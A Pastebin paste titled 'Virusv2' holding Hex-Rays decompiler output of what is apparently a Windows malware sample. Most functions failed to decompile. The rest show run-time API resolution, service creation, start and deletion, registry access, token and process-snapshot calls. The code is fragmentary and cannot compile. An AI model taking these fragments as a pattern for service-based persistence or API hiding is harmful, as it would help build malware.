API tools faq
paste
Guest User

Virusv2>.<

a guest
Nov 23rd, 2012
136
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 25.97 KB | None | 0 0
raw download clone embed print report
  1. /* This file has been generated by the Hex-Rays decompiler.
  2.    Copyright (c) 2009 Hex-Rays <[email protected]>
  3.  
  4.    Detected compiler: Visual C++
  5. */
  6.  
  7. #include <windows.h>
  8. #include <defs.h>
  9.  
  10.  
  11. //-------------------------------------------------------------------------
  12. // Data declarations
  13.  
  14. extern _UNKNOWN sub_4011EB; // weak
  15. extern _UNKNOWN sub_40137A; // weak
  16. extern _UNKNOWN sub_401427; // weak
  17. extern _UNKNOWN sub_4015E3; // weak
  18. extern _UNKNOWN sub_401D9A; // weak
  19. extern _UNKNOWN sub_40351C; // weak
  20. extern _UNKNOWN loc_40358E; // weak
  21. extern _UNKNOWN sub_40373C; // weak
  22. extern _UNKNOWN sub_403A58; // weak
  23. extern _UNKNOWN sub_403AE0; // weak
  24. extern _UNKNOWN sub_403D33; // weak
  25. extern _UNKNOWN sub_403F54; // weak
  26. extern _UNKNOWN sub_404124; // weak
  27. extern _UNKNOWN sub_404344; // weak
  28. extern _UNKNOWN sub_404490; // weak
  29. extern _UNKNOWN sub_404564; // weak
  30. extern _UNKNOWN sub_40466B; // weak
  31. extern _UNKNOWN sub_404713; // weak
  32. extern _UNKNOWN sub_404870; // weak
  33. extern _UNKNOWN sub_404914; // weak
  34. extern _UNKNOWN sub_404BA5; // weak
  35. extern _UNKNOWN sub_404C7E; // weak
  36. extern _UNKNOWN sub_404DAD; // weak
  37. extern _UNKNOWN loc_404DC6; // weak
  38. extern _UNKNOWN sub_404EDA; // weak
  39. extern _UNKNOWN sub_405096; // weak
  40. extern _UNKNOWN sub_40517E; // weak
  41. extern _UNKNOWN sub_4053D7; // weak
  42. extern _UNKNOWN sub_405561; // weak
  43. extern _UNKNOWN sub_405687; // weak
  44. extern _UNKNOWN sub_40570E; // weak
  45. extern _UNKNOWN sub_405A2C; // weak
  46. extern _UNKNOWN sub_405D02; // weak
  47. extern _UNKNOWN sub_405D51; // weak
  48. extern _UNKNOWN sub_405FCC; // weak
  49. extern _UNKNOWN sub_406000; // weak
  50. extern _UNKNOWN sub_4061AC; // weak
  51. extern _UNKNOWN sub_406363; // weak
  52. extern _UNKNOWN sub_4064BB; // weak
  53. extern _UNKNOWN sub_406AF7; // weak
  54. extern _UNKNOWN sub_406BF0; // weak
  55. extern _UNKNOWN sub_406C4C; // weak
  56. extern _UNKNOWN sub_406D7F; // weak
  57. extern _UNKNOWN sub_406E73; // weak
  58. extern _UNKNOWN sub_406F63; // weak
  59. extern _UNKNOWN sub_407157; // weak
  60. extern _UNKNOWN sub_4072C5; // weak
  61. extern _UNKNOWN sub_4076AE; // weak
  62. extern _UNKNOWN sub_408434; // weak
  63. extern _UNKNOWN sub_4085C5; // weak
  64. extern _UNKNOWN sub_408753; // weak
  65. extern _UNKNOWN sub_40886F; // weak
  66. extern _UNKNOWN sub_40A3D6; // weak
  67. extern _UNKNOWN sub_40A562; // weak
  68. extern _UNKNOWN sub_40AA65; // weak
  69. extern _UNKNOWN loc_40AD9B; // weak
  70. extern _UNKNOWN sub_40AE49; // weak
  71. extern _UNKNOWN loc_40B7E2; // weak
  72. extern _UNKNOWN unk_40C169; // weak
  73. extern _UNKNOWN unk_40C175; // weak
  74. extern _UNKNOWN unk_40C181; // weak
  75. extern _UNKNOWN unk_40C1D5; // weak
  76. extern _UNKNOWN unk_40C21D; // weak
  77. extern char aOpenscmanagera[15]; // weak
  78. extern char aCreateservicea[15]; // weak
  79. extern char aStartservicea[14]; // weak
  80. extern char aRegclosekey[12]; // weak
  81. extern char aCreatetoolhelp[25]; // weak
  82.  
  83. //-------------------------------------------------------------------------
  84. // Function declarations
  85.  
  86. int __cdecl locret_401639(int); // weak
  87. void __cdecl sub_40356B();
  88. void __cdecl sub_403587();
  89. int loc_405AF2(); // weak
  90. // void *__usercall sub_405B88<eax>(int a1<eax>, const CHAR *a2, const CHAR *a3);
  91. // void *__usercall sub_4068ED<eax>(int a1<eax>, const CHAR *a2, const CHAR *a3);
  92. // HMODULE __usercall sub_406F42<eax>(int a1<eax>, int a2<ebx>, int a3<ebp>, int a4<esi>, const CHAR *a5);
  93. int __cdecl loc_406F87(int, int); // weak
  94. LSTATUS __cdecl sub_406FE7(HKEY a1, const CHAR *a2, DWORD a3, REGSAM a4, HKEY *a5);
  95. void __cdecl sub_40728E();
  96. int __far loc_407295(); // weak
  97. // HMODULE __usercall sub_408135<eax>(int a1<ebx>, int a2<esi>, const CHAR *a3);
  98. LPSTR __cdecl sub_4081C7(CHAR *a1, const CHAR *a2);
  99. LPSTR __cdecl sub_408291(char a1);
  100. void __cdecl sub_40848F();
  101. // HMODULE __usercall sub_408806<eax>(int a1<eax>, int a2<ebx>, int a3<ebp>, const CHAR *a4);
  102. // void __usercall sub_40881E(int a1<eax>);
  103. int loc_408822(); // weak
  104. BOOL __cdecl sub_40A069(void *a1, DWORD a2, BOOL a3, HANDLE *a4);
  105. int __stdcall sub_40A5AA(_DWORD, _DWORD); // weak
  106. // HMODULE __usercall sub_40A710<eax>(int a1<eax>, int a2<edx>, int a3<edi>, const CHAR *a4);
  107. // HMODULE __userpurge sub_40A896<eax>(int a1<eax>, int a2<ebx>, int a3<ebp>, int a4<esi>, const CHAR *a5, int a6, int a7, int a8, int a9, int a10, int a11, int a12, int a13, int a14, int a15, int a16, int a17, int a18, int a19, int a20, int a21, int a22, int a23, int a24, int a25, int a26, int a27, int a28, int a29, int a30, int a31, int a32, int a33, int a34, int a35, int a36, int a37, int a38, int a39, int a40, int a41, int a42, int a43, int a44, int a45, int a46, int a47, int a48, int a49, int a50, int a51, int a52, int a53, int a54, int a55, int a56, int a57, int a58, int a59, int a60, int a61, int a62, int a63);
  108. // DWORD __usercall sub_40AD3F<eax>(int a1<eax>, SC_HANDLE a2, int a3, int a4);
  109. void __cdecl sub_40AD94();
  110. // int except_handler3(); weak
  111. int __cdecl sub_40B9A0();
  112. // LSTATUS __stdcall RegQueryValueExA(HKEY hKey, LPCSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData);
  113. // BOOL __stdcall DeleteService(SC_HANDLE hService);
  114. // BOOL __stdcall OpenThreadToken(HANDLE ThreadHandle, DWORD DesiredAccess, BOOL OpenAsSelf, PHANDLE TokenHandle);
  115. // LSTATUS __stdcall RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult);
  116. // DWORD __stdcall GetLastError();
  117. // LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2);
  118. // LPSTR __stdcall lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
  119. // HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName);
  120. // HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName);
  121. // FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName);
  122.  
  123.  
  124. //----- (004011EB) --------------------------------------------------------
  125. #error "4011F6: positive sp value has been found (funcsize=3)"
  126.  
  127. //----- (0040137A) --------------------------------------------------------
  128. int sub_40137A(...)
  129. {
  130.   JUMPOUT(a1, 0, *(unsigned int *)locret_401639);
  131.   return GetProcAddress(*(HMODULE *)(&a2 + 2), *(LPCSTR *)(&a2 + 6));
  132. }
  133. // 401639: using guessed type int __cdecl locret_401639(int);
  134.  
  135. //----- (00401427) --------------------------------------------------------
  136. #error "401438: positive sp value has been found (funcsize=5)"
  137.  
  138. //----- (00401568) --------------------------------------------------------
  139. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  140.  
  141. //----- (004015E3) --------------------------------------------------------
  142. #error "4015F1: positive sp value has been found (funcsize=5)"
  143.  
  144. //----- (004016F8) --------------------------------------------------------
  145. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  146.  
  147. //----- (00401D9A) --------------------------------------------------------
  148. #error "401DA5: positive sp value has been found (funcsize=3)"
  149.  
  150. //----- (0040314A) --------------------------------------------------------
  151. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  152.  
  153. //----- (0040329D) --------------------------------------------------------
  154. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  155.  
  156. //----- (004032AB) --------------------------------------------------------
  157. #error "FFFFFFFF: function frame is wrong (funcsize=0)"
  158.  
  159. //----- (0040351C) --------------------------------------------------------
  160. #error "403533: positive sp value has been found (funcsize=6)"
  161.  
  162. //----- (0040356B) --------------------------------------------------------
  163. void __cdecl sub_40356B()
  164. {
  165.   JUMPOUT(loc_40B7E2);
  166. }
  167.  
  168. //----- (00403587) --------------------------------------------------------
  169. void __cdecl sub_403587()
  170. {
  171.   JUMPOUT(loc_40358E);
  172. }
  173.  
  174. //----- (004035DA) --------------------------------------------------------
  175. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  176.  
  177. //----- (0040373C) --------------------------------------------------------
  178. #error "403747: positive sp value has been found (funcsize=3)"
  179.  
  180. //----- (00403A4A) --------------------------------------------------------
  181. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  182.  
  183. //----- (00403A58) --------------------------------------------------------
  184. #error "403A63: positive sp value has been found (funcsize=3)"
  185.  
  186. //----- (00403AE0) --------------------------------------------------------
  187. #error "403AEB: positive sp value has been found (funcsize=3)"
  188.  
  189. //----- (00403BED) --------------------------------------------------------
  190. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  191.  
  192. //----- (00403D33) --------------------------------------------------------
  193. #error "403D3E: positive sp value has been found (funcsize=3)"
  194.  
  195. //----- (00403F54) --------------------------------------------------------
  196. #error "403F5F: positive sp value has been found (funcsize=3)"
  197.  
  198. //----- (00403FF9) --------------------------------------------------------
  199. #error "FFFFFFFF: function frame is wrong (funcsize=0)"
  200.  
  201. //----- (00404124) --------------------------------------------------------
  202. #error "40412F: positive sp value has been found (funcsize=3)"
  203.  
  204. //----- (00404344) --------------------------------------------------------
  205. #error "40434F: positive sp value has been found (funcsize=3)"
  206.  
  207. //----- (00404490) --------------------------------------------------------
  208. #error "40449B: positive sp value has been found (funcsize=3)"
  209.  
  210. //----- (00404564) --------------------------------------------------------
  211. int sub_404564(...)
  212. {
  213.   void *result; // eax@2
  214.  
  215.   if ( a1 )
  216.     result = GetProcAddress(*(HMODULE *)(&a2 + 2), *(LPCSTR *)(&a2 + 6));
  217.   else
  218.     result = LoadLibraryA(*(LPCSTR *)(&a2 + 2));
  219.   return result;
  220. }
  221.  
  222. //----- (0040466B) --------------------------------------------------------
  223. #error "404676: positive sp value has been found (funcsize=3)"
  224.  
  225. //----- (00404713) --------------------------------------------------------
  226. #error "40471E: positive sp value has been found (funcsize=3)"
  227.  
  228. //----- (00404870) --------------------------------------------------------
  229. int sub_404870(...)
  230. {
  231.   void *result; // eax@2
  232.  
  233.   if ( a1 )
  234.     result = GetProcAddress(*(HMODULE *)(&a2 + 2), *(LPCSTR *)(&a2 + 6));
  235.   else
  236.     result = LoadLibraryA(*(LPCSTR *)(&a2 + 2));
  237.   return result;
  238. }
  239.  
  240. //----- (00404914) --------------------------------------------------------
  241. #error "40491F: positive sp value has been found (funcsize=3)"
  242.  
  243. //----- (00404B97) --------------------------------------------------------
  244. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  245.  
  246. //----- (00404BA5) --------------------------------------------------------
  247. #error "404BB0: positive sp value has been found (funcsize=3)"
  248.  
  249. //----- (00404C7E) --------------------------------------------------------
  250. #error "404C89: positive sp value has been found (funcsize=3)"
  251.  
  252. //----- (00404DAD) --------------------------------------------------------
  253. #error "404DB8: positive sp value has been found (funcsize=3)"
  254.  
  255. //----- (00404EDA) --------------------------------------------------------
  256. #error "404EE5: positive sp value has been found (funcsize=3)"
  257.  
  258. //----- (00405096) --------------------------------------------------------
  259. #error "4050A1: positive sp value has been found (funcsize=3)"
  260.  
  261. //----- (0040517E) --------------------------------------------------------
  262. #error "405189: positive sp value has been found (funcsize=3)"
  263.  
  264. //----- (004052FF) --------------------------------------------------------
  265. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  266.  
  267. //----- (0040530D) --------------------------------------------------------
  268. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  269.  
  270. //----- (004053D7) --------------------------------------------------------
  271. #error "4053E2: positive sp value has been found (funcsize=3)"
  272.  
  273. //----- (00405561) --------------------------------------------------------
  274. #error "40556C: positive sp value has been found (funcsize=3)"
  275.  
  276. //----- (00405687) --------------------------------------------------------
  277. #error "405692: positive sp value has been found (funcsize=3)"
  278.  
  279. //----- (0040570E) --------------------------------------------------------
  280. #error "405719: positive sp value has been found (funcsize=3)"
  281.  
  282. //----- (00405A2C) --------------------------------------------------------
  283. #error "405A37: positive sp value has been found (funcsize=3)"
  284.  
  285. //----- (00405B88) --------------------------------------------------------
  286. void *__usercall sub_405B88<eax>(int a1<eax>, const CHAR *a2, const CHAR *a3)
  287. {
  288.   void *result; // eax@2
  289.  
  290.   if ( a1 )
  291.     result = GetProcAddress((HMODULE)a2, a3);
  292.   else
  293.     result = LoadLibraryA(a2);
  294.   return result;
  295. }
  296.  
  297. //----- (00405D02) --------------------------------------------------------
  298. #error "405D0D: positive sp value has been found (funcsize=3)"
  299.  
  300. //----- (00405D51) --------------------------------------------------------
  301. #error "405D5C: positive sp value has been found (funcsize=3)"
  302.  
  303. //----- (00405FBE) --------------------------------------------------------
  304. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  305.  
  306. //----- (00405FCC) --------------------------------------------------------
  307. #error "405FD7: positive sp value has been found (funcsize=3)"
  308.  
  309. //----- (00406000) --------------------------------------------------------
  310. #error "40600B: positive sp value has been found (funcsize=3)"
  311.  
  312. //----- (004061AC) --------------------------------------------------------
  313. #error "4061B7: positive sp value has been found (funcsize=3)"
  314.  
  315. //----- (00406363) --------------------------------------------------------
  316. #error "40636E: positive sp value has been found (funcsize=3)"
  317.  
  318. //----- (004064BB) --------------------------------------------------------
  319. #error "4064C6: positive sp value has been found (funcsize=3)"
  320.  
  321. //----- (004068ED) --------------------------------------------------------
  322. void *__usercall sub_4068ED<eax>(int a1<eax>, const CHAR *a2, const CHAR *a3)
  323. {
  324.   void *result; // eax@2
  325.  
  326.   if ( a1 )
  327.     result = GetProcAddress((HMODULE)a2, a3);
  328.   else
  329.     result = LoadLibraryA(a2);
  330.   return result;
  331. }
  332.  
  333. //----- (004069EF) --------------------------------------------------------
  334. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  335.  
  336. //----- (00406AF7) --------------------------------------------------------
  337. #error "406B02: positive sp value has been found (funcsize=3)"
  338.  
  339. //----- (00406BF0) --------------------------------------------------------
  340. #error "406BFB: positive sp value has been found (funcsize=3)"
  341.  
  342. //----- (00406C4C) --------------------------------------------------------
  343. #error "406C57: positive sp value has been found (funcsize=3)"
  344.  
  345. //----- (00406D7F) --------------------------------------------------------
  346. int sub_406D7F(...)
  347. {
  348.   JUMPOUT(a1, 0, *(unsigned int *)loc_406F87);
  349.   return RegQueryValueExA(
  350.            *(HKEY *)&a2[2],
  351.            *(LPCSTR *)&a2[6],
  352.            *(LPDWORD *)&a2[10],
  353.            *(LPDWORD *)&a2[14],
  354.            *(LPBYTE *)&a2[18],
  355.            *(LPDWORD *)&a2[22]);
  356. }
  357. // 406F87: using guessed type int __cdecl loc_406F87(int, int);
  358.  
  359. //----- (00406E73) --------------------------------------------------------
  360. #error "406E7E: positive sp value has been found (funcsize=3)"
  361.  
  362. //----- (00406F42) --------------------------------------------------------
  363. HMODULE __usercall sub_406F42<eax>(int a1<eax>, int a2<ebx>, int a3<ebp>, int a4<esi>, const CHAR *a5)
  364. {
  365.   int v6; // [sp+8h] [bp-3Ch]@1
  366.   int v7; // [sp+Ch] [bp-38h]@1
  367.   int v8; // [sp+1Ch] [bp-28h]@1
  368.   int v9; // [sp+20h] [bp-24h]@1
  369.   int v10; // [sp+24h] [bp-20h]@1
  370.   int *v11; // [sp+28h] [bp-1Ch]@1
  371.   int v12; // [sp+2Ch] [bp-18h]@1
  372.   int (*v13)(); // [sp+30h] [bp-14h]@1
  373.   int v14; // [sp+34h] [bp-10h]@1
  374.   int v15; // [sp+38h] [bp-Ch]@1
  375.   int v16; // [sp+3Ch] [bp-8h]@1
  376.  
  377.   *(_DWORD *)(a3 - 8) = a2;
  378.   v16 = a3;
  379.   v15 = -1;
  380.   v14 = (int)&unk_40C1D5;
  381.   v13 = except_handler3;
  382.   v12 = a1;
  383.   v7 = a2;
  384.   v6 = a4;
  385.   v11 = &v6;
  386.   v8 = *(_DWORD *)"RegCloseKey";
  387.   v9 = *(_DWORD *)&aRegclosekey[4];
  388.   v10 = *(_DWORD *)&aRegclosekey[8];
  389.   return GetModuleHandleA(a5);
  390. }
  391. // 40B7EE: using guessed type int except_handler3();
  392.  
  393. //----- (00406F63) --------------------------------------------------------
  394. #error "406F6A: positive sp value has been found (funcsize=2)"
  395.  
  396. //----- (00406FE7) --------------------------------------------------------
  397. LSTATUS __cdecl sub_406FE7(HKEY a1, const CHAR *a2, DWORD a3, REGSAM a4, HKEY *a5)
  398. {
  399.   __asm { popfw }
  400.   return RegOpenKeyExA(a1, a2, a3, a4, a5);
  401. }
  402. // 406FE7: could not find valid save-restore pair for edi
  403.  
  404. //----- (00407157) --------------------------------------------------------
  405. #error "40715D: positive sp value has been found (funcsize=2)"
  406.  
  407. //----- (0040728E) --------------------------------------------------------
  408. void __cdecl sub_40728E()
  409. {
  410.   JUMPOUT(*(int *)loc_407295);
  411. }
  412. // 407295: using guessed type int __far loc_407295();
  413.  
  414. //----- (004072C5) --------------------------------------------------------
  415. #error "4072CC: positive sp value has been found (funcsize=2)"
  416.  
  417. //----- (004076AE) --------------------------------------------------------
  418. #error "4076B9: positive sp value has been found (funcsize=3)"
  419.  
  420. //----- (00408135) --------------------------------------------------------
  421. HMODULE __usercall sub_408135<eax>(int a1<ebx>, int a2<esi>, const CHAR *a3)
  422. {
  423.   int v3; // ST10_4@1
  424.   int v13; // [sp+20h] [bp-40h]@1
  425.   int v14; // [sp+24h] [bp-3Ch]@1
  426.   int v15; // [sp+34h] [bp-2Ch]@1
  427.   int v16; // [sp+38h] [bp-28h]@1
  428.   int v17; // [sp+3Ch] [bp-24h]@1
  429.   __int16 v18; // [sp+40h] [bp-20h]@1
  430.   int v19; // [sp+42h] [bp-1Eh]@1
  431.   int v20; // [sp+48h] [bp-18h]@1
  432.   int (*v21)(); // [sp+4Ch] [bp-14h]@1
  433.   _BYTE v22[6]; // [sp+4Eh] [bp-12h]@1
  434.   int v23; // [sp+54h] [bp-Ch]@1
  435.   int v24; // [sp+58h] [bp-8h]@1
  436.  
  437.   __asm { popfw }
  438.   v24 = v3;
  439.   v23 = -1;
  440.   *(_DWORD *)&v22[2] = &unk_40C175;
  441.   v21 = except_handler3;
  442.   v20 = a2;
  443.   __asm { pushfw }
  444.   v19 = 4211974;
  445.   __asm { popfw }
  446.   v14 = a1;
  447.   v13 = a2;
  448.   *(int *)((char *)&v19 + 2) = (int)&v13;
  449.   v15 = *(_DWORD *)"CreateServiceA";
  450.   v16 = *(_DWORD *)&aCreateservicea[4];
  451.   v17 = *(_DWORD *)&aCreateservicea[8];
  452.   v18 = *(_WORD *)&aCreateservicea[12];
  453.   LOBYTE(v19) = aCreateservicea[14];
  454.   return GetModuleHandleA(a3);
  455. }
  456. // 40B7EE: using guessed type int except_handler3();
  457.  
  458. //----- (004081C7) --------------------------------------------------------
  459. LPSTR __cdecl sub_4081C7(CHAR *a1, const CHAR *a2)
  460. {
  461.   return lstrcpyA(a1, a2);
  462. }
  463.  
  464. //----- (00408291) --------------------------------------------------------
  465. LPSTR __cdecl sub_408291(char a1)
  466. {
  467.   __asm { popfw }
  468.   return lstrcatA(*(LPSTR *)(&a1 + 2), *(LPCSTR *)(&a1 + 6));
  469. }
  470.  
  471. //----- (00408434) --------------------------------------------------------
  472. #error "40843F: positive sp value has been found (funcsize=3)"
  473.  
  474. //----- (0040848F) --------------------------------------------------------
  475. void __cdecl sub_40848F()
  476. {
  477.   JUMPOUT(*(unsigned int *)loc_405AF2);
  478. }
  479. // 405AF2: using guessed type int loc_405AF2();
  480.  
  481. //----- (00408520) --------------------------------------------------------
  482. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  483.  
  484. //----- (0040852E) --------------------------------------------------------
  485. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  486.  
  487. //----- (004085C5) --------------------------------------------------------
  488. #error "4085C5: positive sp value has been found (funcsize=0)"
  489.  
  490. //----- (00408729) --------------------------------------------------------
  491. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  492.  
  493. //----- (00408737) --------------------------------------------------------
  494. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  495.  
  496. //----- (00408745) --------------------------------------------------------
  497. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  498.  
  499. //----- (00408753) --------------------------------------------------------
  500. #error "40875E: positive sp value has been found (funcsize=3)"
  501.  
  502. //----- (00408806) --------------------------------------------------------
  503. HMODULE __usercall sub_408806<eax>(int a1<eax>, int a2<ebx>, int a3<ebp>, const CHAR *a4)
  504. {
  505.   int v4; // ST06_4@1
  506.   int v10; // [sp+4h] [bp-40h]@1
  507.   int v11; // [sp+8h] [bp-3Ch]@1
  508.   int v12; // [sp+18h] [bp-2Ch]@1
  509.   int v13; // [sp+1Ch] [bp-28h]@1
  510.   int v14; // [sp+20h] [bp-24h]@1
  511.   __int16 v15; // [sp+24h] [bp-20h]@1
  512.   int *v16; // [sp+28h] [bp-1Ch]@1
  513.   int v17; // [sp+2Ch] [bp-18h]@1
  514.   int (*v18)(); // [sp+30h] [bp-14h]@1
  515.   int v19; // [sp+34h] [bp-10h]@1
  516.   int v20; // [sp+38h] [bp-Ch]@1
  517.   int v21; // [sp+3Ch] [bp-8h]@1
  518.  
  519.   __asm { popfw }
  520.   v21 = a3;
  521.   v20 = -1;
  522.   v19 = (int)&unk_40C181;
  523.   v18 = except_handler3;
  524.   v17 = a1;
  525.   v11 = a2;
  526.   v10 = v4;
  527.   v16 = &v10;
  528.   v12 = *(_DWORD *)"StartServiceA";
  529.   v13 = *(_DWORD *)&aStartservicea[4];
  530.   v14 = *(_DWORD *)&aStartservicea[8];
  531.   v15 = *(_WORD *)&aStartservicea[12];
  532.   return GetModuleHandleA(a4);
  533. }
  534. // 40B7EE: using guessed type int except_handler3();
  535.  
  536. //----- (0040881E) --------------------------------------------------------
  537. void __usercall sub_40881E(int a1<eax>)
  538. {
  539.   if ( !a1 )
  540.     JUMPOUT(*(int *)loc_408822);
  541.   JUMPOUT(loc_404DC6);
  542. }
  543. // 408822: using guessed type int loc_408822();
  544.  
  545. //----- (0040886F) --------------------------------------------------------
  546. #error "408878: positive sp value has been found (funcsize=3)"
  547.  
  548. //----- (00409F38) --------------------------------------------------------
  549. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  550.  
  551. //----- (0040A069) --------------------------------------------------------
  552. BOOL __cdecl sub_40A069(void *a1, DWORD a2, BOOL a3, HANDLE *a4)
  553. {
  554.   __asm { popfw }
  555.   return OpenThreadToken(a1, a2, a3, a4);
  556. }
  557.  
  558. //----- (0040A3D6) --------------------------------------------------------
  559. #error "40A3E1: positive sp value has been found (funcsize=3)"
  560.  
  561. //----- (0040A562) --------------------------------------------------------
  562. #error "40A590: call analysis failed (funcsize=17)"
  563.  
  564. //----- (0040A5AA) --------------------------------------------------------
  565. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  566.  
  567. //----- (0040A674) --------------------------------------------------------
  568. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  569.  
  570. //----- (0040A710) --------------------------------------------------------
  571. HMODULE __usercall sub_40A710<eax>(int a1<eax>, int a2<edx>, int a3<edi>, const CHAR *a4)
  572. {
  573.   int v4; // ST22_4@1
  574.   __int64 v10; // [sp+18h] [bp-52h]@1
  575.   int v11; // [sp+22h] [bp-48h]@1
  576.   char v12; // [sp+32h] [bp-38h]@1
  577.   char *v13; // [sp+4Eh] [bp-1Ch]@1
  578.   int v14; // [sp+52h] [bp-18h]@1
  579.   int (*v15)(); // [sp+56h] [bp-14h]@1
  580.   int v16; // [sp+5Ah] [bp-10h]@1
  581.   int v17; // [sp+5Eh] [bp-Ch]@1
  582.   int v18; // [sp+62h] [bp-8h]@1
  583.  
  584.   __asm { popfw }
  585.   v18 = v4;
  586.   v17 = -1;
  587.   v16 = (int)&unk_40C21D;
  588.   v15 = except_handler3;
  589.   v14 = a1;
  590.   v11 = a2;
  591.   v13 = (char *)&v10 + 6;
  592.   memcpy(&v12, "CreateToolhelp32Snapshot", 4 * a3 + 1);
  593.   return GetModuleHandleA(a4);
  594. }
  595. // 40B7EE: using guessed type int except_handler3();
  596.  
  597. //----- (0040A896) --------------------------------------------------------
  598. HMODULE __userpurge sub_40A896<eax>(int a1<eax>, int a2<ebx>, int a3<ebp>, int a4<esi>, const CHAR *a5, int a6, int a7, int a8, int a9, int a10, int a11, int a12, int a13, int a14, int a15, int a16, int a17, int a18, int a19, int a20, int a21, int a22, int a23, int a24, int a25, int a26, int a27, int a28, int a29, int a30, int a31, int a32, int a33, int a34, int a35, int a36, int a37, int a38, int a39, int a40, int a41, int a42, int a43, int a44, int a45, int a46, int a47, int a48, int a49, int a50, int a51, int a52, int a53, int a54, int a55, int a56, int a57, int a58, int a59, int a60, int a61, int a62, int a63)
  599. {
  600.   int v73; // [sp+1Eh] [bp-40h]@1
  601.   int v74; // [sp+22h] [bp-3Ch]@1
  602.   int v75; // [sp+32h] [bp-2Ch]@1
  603.   int v76; // [sp+36h] [bp-28h]@1
  604.   int v77; // [sp+3Ah] [bp-24h]@1
  605.   __int16 v78; // [sp+3Eh] [bp-20h]@1
  606.   char v79; // [sp+40h] [bp-1Eh]@1
  607.   int *v80; // [sp+42h] [bp-1Ch]@1
  608.   int v81; // [sp+46h] [bp-18h]@1
  609.   int (*v82)(); // [sp+4Ah] [bp-14h]@1
  610.   int v83; // [sp+4Eh] [bp-10h]@1
  611.   int v84; // [sp+52h] [bp-Ch]@1
  612.   int v85; // [sp+56h] [bp-8h]@1
  613.  
  614.   __asm { popfw }
  615.   v85 = a3;
  616.   v84 = -1;
  617.   v83 = (int)&unk_40C169;
  618.   v82 = except_handler3;
  619.   v81 = a1;
  620.   v74 = a2;
  621.   v73 = a4;
  622.   v80 = &v73;
  623.   v75 = *(_DWORD *)"OpenSCManagerA";
  624.   v76 = *(_DWORD *)&aOpenscmanagera[4];
  625.   v77 = *(_DWORD *)&aOpenscmanagera[8];
  626.   v78 = *(_WORD *)&aOpenscmanagera[12];
  627.   v79 = aOpenscmanagera[14];
  628.   return GetModuleHandleA(a5);
  629. }
  630. // 40B7EE: using guessed type int except_handler3();
  631.  
  632. //----- (0040A972) --------------------------------------------------------
  633. #error "FFFFFFFF: function frame is wrong (funcsize=0)"
  634.  
  635. //----- (0040AA65) --------------------------------------------------------
  636. #error "40AA70: positive sp value has been found (funcsize=3)"
  637.  
  638. //----- (0040AB80) --------------------------------------------------------
  639. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  640.  
  641. //----- (0040AD3F) --------------------------------------------------------
  642. DWORD __usercall sub_40AD3F<eax>(int a1<eax>, SC_HANDLE a2, int a3, int a4)
  643. {
  644.   DWORD result; // eax@2
  645.  
  646.   if ( a1 )
  647.     result = DeleteService(a2);
  648.   else
  649.     result = GetLastError();
  650.   return result;
  651. }
  652.  
  653. //----- (0040AD94) --------------------------------------------------------
  654. void __cdecl sub_40AD94()
  655. {
  656.   JUMPOUT(loc_40AD9B);
  657. }
  658.  
  659. //----- (0040AE1F) --------------------------------------------------------
  660. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  661.  
  662. //----- (0040AE49) --------------------------------------------------------
  663. #error "40AE71: positive sp value has been found (funcsize=9)"
  664.  
  665. //----- (0040AFBB) --------------------------------------------------------
  666. #error "FFFFFFFF: positive sp value has been found (funcsize=0)"
  667.  
  668. //----- (0040B004) --------------------------------------------------------
  669. #error "FFFFFFFF: function frame is wrong (funcsize=0)"
  670.  
  671. //----- (0040B9A0) --------------------------------------------------------
  672. int __cdecl sub_40B9A0()
  673. {
  674.   return 0;
  675. }
  676.  
  677. #error "There were 77 decompilation failure(s) on 100 function(s)"
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!